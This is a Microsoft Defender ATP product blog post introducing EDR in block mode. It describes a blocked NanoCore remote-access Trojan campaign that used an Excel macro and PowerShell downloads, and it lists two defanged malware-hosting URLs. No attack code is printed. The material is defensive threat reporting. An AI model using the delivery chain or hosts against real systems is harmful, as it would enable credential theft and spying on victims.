Endpoint detection and response (EDR) in block mode is a new capability in Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP) that turns EDR detections into blocking and containment of malicious behaviors. This capability uses Microsoft Defender ATP’s industry-leading visibility and detection capability to provide an additional layer of post-breach blocking of malicious behavior, malware, and other artifacts that your primary antivirus solution might miss.
Through built-in machine learning models in Microsoft Defender ATP, EDR in block mode extends behavioral blocking and containment, which uses machine learning-driven protection engines that specialize in detecting threats by analyzing behavior. The ability of this feature to detect and stop threats in real time, even after they have started running, empowers organizations to thwart cyberattacks, maintain security posture, and reduce the manual steps and time to respond to threats.
When EDR in block mode detects malicious behaviors or artifacts, it stops related running processes, blocking the attack from progressing. These blocks are reported in Microsoft Defender Security Center, where security teams can see details of the threat and remediation status, and use Microsoft Defender ATP’s rich set of capabilities to further investigate and hunt for similar threats as necessary.
Figure 1. Sample Microsoft Defender ATP alert on threat caught by EDR in block mode
EDR in block mode was developed in close collaboration with customers, and is in public preview starting today. We thank our customers for the partnership and for the invaluable feedback during the limited preview, during which the feature blocked multiple real-world attacks. In this blog, we’ll share details about one of these attacks.
EDR block mode in action
In April of this year, EDR in block mode protected and blocked a NanoCore RAT attack that aimed to steal credentials, spy using a device’s camera, and pilfer other information. The attack started with a spear-phishing email carrying a malicious Excel attachment. The Excel file contained a malicious macro that, when enabled, ran a PowerShell code that in turn downloaded and ran a file from hxxp://office-services-labs[.]com/Scan.exe.
Figure 2. Malicious Excel file used in NanoCore campaign
The organization’s non-Microsoft antivirus solution didn’t detect the Excel file or its behavior, but Microsoft Defender ATP did. EDR in block mode kicked in, stopping the download behavior and blocking the PowerShell code and Excel file. This was reported in the Microsoft Defender Security Center, alerting the security team about the blocked behavior. While the threat was automatically remediated, the alert empowers the security team to perform additional investigation and hunting for similar threats.
Figure 3. EDR in block mode alert in Microsoft Defender Security Center
Had the attack been allowed to continue, the downloaded file Scan.exe would have run the following PowerShell commands, which would have downloaded the payload, a NanoCore variant, from hxxp://paste[.]ee/r/Pym5k:
Figure 4. Malicious PowerShell commands used by NanoCore campaign
NanoCore is a family of remote access Trojans (RAT) that gather info about the affected device and operating system. It is designed to steal credentials, spy through cameras, and carry out other malicious activities. With EDR in block mode, Microsoft Defender ATP protected against the damaging impact of a successful NanoCore infection.
Figure 5. NanoCore RAT attack chain
Turning on EDR in block mode
EDR in block mode is in public preview starting today, so if you have preview features turned on in Microsoft Defender Security Center, you can try it now. Once you’ve opted in, turning on EDR in block mode is simple. Go to Settings > Advanced features. Switch the toggle for “Enable EDR in block mode” to On.
Figure 6. Microsoft Defender Security Center Advanced features settings
Security teams are also informed about this feature via the security recommendation titled, “Enable EDR in block mode” in threat and vulnerability management.
Figure 7. EDR in block mode in security recommendations
To learn more about the behavioral blocking and containment capabilities in Microsoft Defender ATP watch this SANS Webcast, refer to our documentation, and read this blog.
If you’re not yet taking advantage of Microsoft’s industry-leading security optics and detection capabilities for endpoints, sign up for a free trial of Microsoft Defender ATP today.
We welcome your feedback. If you have any comments or questions, let us know.
Jeong Mun and Shweta Jha
Microsoft Defender ATP team